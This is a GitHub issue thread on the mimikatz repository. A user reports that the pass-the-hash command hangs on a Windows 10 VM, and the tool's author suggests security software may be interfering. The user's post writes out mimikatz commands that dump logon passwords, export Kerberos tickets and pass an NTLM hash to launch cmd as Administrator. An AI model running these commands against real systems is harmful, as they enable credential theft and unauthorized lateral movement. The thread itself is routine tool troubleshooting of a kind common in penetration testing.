### ISSUE TITLE
pth hangs Windows [Version 10.0.14393]  mimikatz 2.1 (x64) 

### ISSUE THREAD

**Issue by Gabba12113** [gentilkiwi/mimikatz#67]
Hi,

i tried your newest prebuilt of mimikatz.  mimikatz 2.1 (x64) built on Oct  5 2016 20:44:55
My VM is: Microsoft Windows [Version 10.0.14393]

I started mimikatz as admin an executed the following commands:
```
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::tickets /export
```
AND

```
mimikatz # sekurlsa::pth /user:Administrator /domain:AD /ntlm:2abbb8f7bc3b7ffaf3897408b69u9d36 /run:cmd
```

But the mimikatz console hangs after the following output:
```
user	: Administrator
domain	: AD
program	: cmd
impers.	: no
NTLM	: 2abbb8f7bc3b7ffaf3897408b69u9d36
```
After this, there is no further output, the console cursor blinks and I am stuck.

Do you now why? I tried it on my Windows 8.1 before, successfully!

**Comment by gentilkiwi** [comment]
Hello,

Interesting behavior. It seems to hang before any hash/credential injection.
First operation is to create anothe process with `CreateProcessWithLogonW`, then print PID/TID.

Maybe a security production on the computer (https://github.com/gentilkiwi/mimikatz/wiki/howto-~-open-an-issue#check-you-dont-have-a-paranoid-security-product)

**Comment by Gabba12113** [comment]
Thanks for your quick reply.
The machine is new and clean.

Nevertheless, i installed a new machine with the same settings. It works fine there. 

I think you can close this here.

Thanks.
